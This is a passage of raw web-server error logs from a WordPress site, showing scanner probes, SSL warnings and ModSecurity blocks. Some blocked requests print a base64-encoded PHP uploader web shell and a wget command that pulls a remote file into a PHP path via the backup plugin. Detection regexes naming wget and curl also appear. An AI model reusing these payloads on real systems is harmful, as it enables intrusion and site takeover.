(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:56.309215 2024] [autoindex:error] [pid 4327:tid 140130413176576] [client 193.46.255.175:59300] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:53:59.553216 2024] [autoindex:error] [pid 4537:tid 140130421569280] [client 193.46.255.175:59308] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:00.963365 2024] [autoindex:error] [pid 17650:tid 140130346034944] [client 193.46.255.175:59310] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:01.302923 2024] [autoindex:error] [pid 4395:tid 140130371213056] [client 193.46.255.175:59312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:01.992753 2024] [autoindex:error] [pid 16982:tid 140130521749248] [client 193.46.255.175:59314] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:03.635724 2024] [autoindex:error] [pid 16983:tid 140130379605760] [client 193.46.255.175:59316] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:04.266139 2024] [autoindex:error] [pid 4327:tid 140130329249536] [client 193.46.255.175:59318] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:05.419136 2024] [autoindex:error] [pid 4537:tid 140130555320064] [client 193.46.255.175:59320] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:06.424146 2024] [autoindex:error] [pid 16983:tid 140130413176576] [client 193.46.255.175:59322] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/random_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:07.440694 2024] [autoindex:error] [pid 4537:tid 140130278893312] [client 193.46.255.175:59324] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:09.000844 2024] [autoindex:error] [pid 16983:tid 140130337642240] [client 193.46.255.175:59326] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:12.335671 2024] [autoindex:error] [pid 16983:tid 140130387998464] [client 193.46.255.175:59328] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:13.507088 2024] [autoindex:error] [pid 16983:tid 140130329249536] [client 193.46.255.175:59336] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:14.781691 2024] [autoindex:error] [pid 16983:tid 140130521749248] [client 193.46.255.175:59342] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:19.082211 2024] [autoindex:error] [pid 4537:tid 140130404783872] [client 193.46.255.175:59350] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:20.042791 2024] [autoindex:error] [pid 4395:tid 140130538534656] [client 193.46.255.175:59352] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:21.372432 2024] [autoindex:error] [pid 17650:tid 140130546927360] [client 193.46.255.175:59354] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:22.883581 2024] [autoindex:error] [pid 4395:tid 140130521749248] [client 193.46.255.175:59356] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:23.346290 2024] [autoindex:error] [pid 16982:tid 140130320856832] [client 193.46.255.175:59358] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:51.126993 2024] [autoindex:error] [pid 16983:tid 140130513356544] [client 193.46.255.175:59414] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:52.338321 2024] [autoindex:error] [pid 16982:tid 140130337642240] [client 193.46.255.175:59416] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:53.903925 2024] [autoindex:error] [pid 17650:tid 140130396391168] [client 193.46.255.175:59418] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:55.176501 2024] [autoindex:error] [pid 4327:tid 140130555320064] [client 193.46.255.175:59422] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:55.718166 2024] [autoindex:error] [pid 4537:tid 140130413176576] [client 193.46.255.175:59424] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:57.404563 2024] [autoindex:error] [pid 4537:tid 140130346034944] [client 193.46.255.175:59426] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:54:58.793258 2024] [autoindex:error] [pid 4537:tid 140130312464128] [client 193.46.255.175:59428] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:55:14.344888 2024] [autoindex:error] [pid 16983:tid 140130354427648] [client 193.46.255.175:59490] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 14:55:18.584979 2024] [autoindex:error] [pid 4327:tid 140130421569280] [client 193.46.255.175:59494] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jan 22 23:13:45.975649 2024] [:error] [pid 4537:tid 140130530141952] [client 178.159.37.38:38846] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:o. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22,base64_decode('PD9waHAgCgoKZWNobyAnPGI+IEtpbmcgUnhSIFdhcyAgSGVyZSBUaGlzIHNvbWUgRnJvbSBNeSBUb29sIDwvYj48L2JyPjxlbT5Pbmx5IEdJRiwgSlBHLCBhbmQgUE5HIGZpbGVzIGFyZSBhbGxvd2VkLjwvZW0+PGNlbnRlcj4gIDxmb3JtIG1ldGhvZD0icG9zdCIgdGFyZ2V0PSJfc2VsZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICA8aW5wdXQgdHlwZT0iZmlsZSIgc2l6ZT0iMjAiIG5hbWU9ImZpbGVfanBnIiAvPiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIiAvPiAgPC9mb3JtPiAgPC9jZW50ZXI+PC90ZD48L3RyPiA8L3RhYmxlPjxicj4nOwoKaWYgKCFlbXB0eSAoJF9GSUxFU1snZmlsZV9..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "Za88-axzwDGvo7DFtbIUwQAAAcM"] [Tue Jan 23 00:49:32.447115 2024] [:error] [pid 4395:tid 140130278893312] [client 178.159.37.38:40792] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:o. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22,base64_decode('PD9waHAgCgoKZWNobyAnPGI+IEtpbmcgUnhSIFdhcyAgSGVyZSBUaGlzIHNvbWUgRnJvbSBNeSBUb29sIDwvYj48L2JyPjxlbT5Pbmx5IEdJRiwgSlBHLCBhbmQgUE5HIGZpbGVzIGFyZSBhbGxvd2VkLjwvZW0+PGNlbnRlcj4gIDxmb3JtIG1ldGhvZD0icG9zdCIgdGFyZ2V0PSJfc2VsZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICA8aW5wdXQgdHlwZT0iZmlsZSIgc2l6ZT0iMjAiIG5hbWU9ImZpbGVfanBnIiAvPiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIiAvPiAgPC9mb3JtPiAgPC9jZW50ZXI+PC90ZD48L3RyPiA8L3RhYmxlPjxicj4nOwoKaWYgKCFlbXB0eSAoJF9GSUxFU1snZmlsZV9..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "Za9TbNYaDNuSO5rBSFwejAAAAVg"] [Tue Jan 23 03:20:23.365549 2024] [ssl:warn] [pid 27018:tid 140656298297216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 23 03:20:35.575894 2024] [ssl:warn] [pid 27029:tid 140656298297216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 23 03:20:35.930064 2024] [ssl:warn] [pid 27029:tid 140656298297216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 23 03:20:37.582499 2024] [ssl:warn] [pid 27029:tid 140656298297216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 23 03:20:39.849426 2024] [ssl:warn] [pid 27445:tid 140205584136064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 23 03:20:48.043788 2024] [ssl:warn] [pid 27449:tid 140205584136064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 23 10:54:32.344432 2024] [:error] [pid 27471:tid 140205239527168] [client 45.130.83.136:52394] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Tue Jan 23 10:54:32.344510 2024] [:error] [pid 27471:tid 140205239527168] [client 45.130.83.136:52394] Stack trace: [Tue Jan 23 10:54:32.344546 2024] [:error] [pid 27471:tid 140205239527168] [client 45.130.83.136:52394] #0 {main} [Tue Jan 23 10:54:32.344615 2024] [:error] [pid 27471:tid 140205239527168] [client 45.130.83.136:52394] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Tue Jan 23 10:54:38.419593 2024] [autoindex:error] [pid 27471:tid 140205289883392] [client 45.130.83.136:52410] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-includes/js/tinymce/skins/lightgray/fonts/index.php 2024/01/24 02:26:44 [error] 27425#27425: *75711 access forbidden by rule, client: 52.55.124.125, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jan 24 03:45:24.569910 2024] [ssl:warn] [pid 12339:tid 139864873387904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 24 03:45:32.772867 2024] [ssl:warn] [pid 12340:tid 139864873387904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 24 03:45:33.140464 2024] [ssl:warn] [pid 12340:tid 139864873387904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 24 03:45:34.840591 2024] [ssl:warn] [pid 12340:tid 139864873387904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 24 03:45:37.100850 2024] [ssl:warn] [pid 12755:tid 140188153878400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 24 03:45:45.275718 2024] [ssl:warn] [pid 12757:tid 140188153878400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/24 04:59:10 [error] 12737#12737: *77554 access forbidden by rule, client: 52.55.124.125, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" 2024/01/24 05:11:42 [error] 12737#12737: *77635 access forbidden by rule, client: 52.55.124.125, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jan 24 11:55:35.899047 2024] [:error] [pid 12775:tid 140187698902784] [client 103.168.147.158:50062] [client 103.168.147.158] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ova. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ova: wget https:/textbin.net/raw/y8zus4kuc6 -OSWA@x7root.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "ZbFBBxrlNdP_WntGJ97TjQAAABg"] [Wed Jan 24 19:03:33.994287 2024] [ssl:warn] [pid 12757:tid 140188153878400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 25 03:42:26.158639 2024] [ssl:warn] [pid 18298:tid 140204027262848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 25 03:42:30.378418 2024] [ssl:warn] [pid 18299:tid 140204027262848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 25 03:42:30.743428 2024] [ssl:warn] [pid 18299:tid 140204027262848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 25 03:42:32.648480 2024] [ssl:warn] [pid 18299:tid 140204027262848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 25 03:42:34.956597 2024] [ssl:warn] [pid 18714:tid 140186406557568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 25 03:42:43.155570 2024] [ssl:warn] [pid 18715:tid 140186406557568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 26 03:34:38.103559 2024] [ssl:warn] [pid 24793:tid 139720777312128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 26 03:34:42.311096 2024] [ssl:warn] [pid 24794:tid 139720777312128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 26 03:34:42.793633 2024] [ssl:warn] [pid 24794:tid 139720777312128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 26 03:34:44.985260 2024] [ssl:warn] [pid 24794:tid 139720777312128] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 26 03:34:47.229009 2024] [ssl:warn] [pid 25211:tid 140590965254016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 26 03:34:55.496702 2024] [ssl:warn] [pid 25212:tid 140590965254016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 26 15:29:33.714155 2024] [autoindex:error] [pid 25232:tid 140590637373184] [client 173.224.119.245:53406] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 27 03:18:27.214047 2024] [ssl:warn] [pid 28392:tid 139685837821824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 27 03:18:35.434686 2024] [ssl:warn] [pid 28396:tid 139685837821824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 27 03:18:36.197966 2024] [ssl:warn] [pid 28396:tid 139685837821824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 27 03:18:39.455165 2024] [ssl:warn] [pid 28396:tid 139685837821824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 27 03:18:41.841107 2024] [ssl:warn] [pid 28884:tid 140501756573568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 27 03:18:50.046950 2024] [ssl:warn] [pid 28888:tid 140501756573568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/27 11:25:16 [error] 28866#28866: *136115 access forbidden by rule, client: 54.164.169.144, server: investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jan 27 13:35:54.800223 2024] [autoindex:error] [pid 28996:tid 140501449692928] [client 173.224.119.245:46216] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 27 13:44:22.948808 2024] [:error] [pid 28909:tid 140501557040896] [client 37.221.92.10:46358] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jan 27 13:44:23.042021 2024] [:error] [pid 28909:tid 140501466478336] [client 37.221.92.10:46360] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jan 27 13:46:49.258260 2024] [autoindex:error] [pid 28910:tid 140501573826304] [client 37.221.92.10:46540] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 27 13:47:15.863285 2024] [:error] [pid 28910:tid 140501416122112] [client 37.221.92.10:46584] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Jan 27 13:47:18.206645 2024] [autoindex:error] [pid 28996:tid 140501365765888] [client 37.221.92.10:46588] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 27 13:47:19.129049 2024] [autoindex:error] [pid 28996:tid 140501466478336] [client 37.221.92.10:46592] AH01276: Cannot serve directory 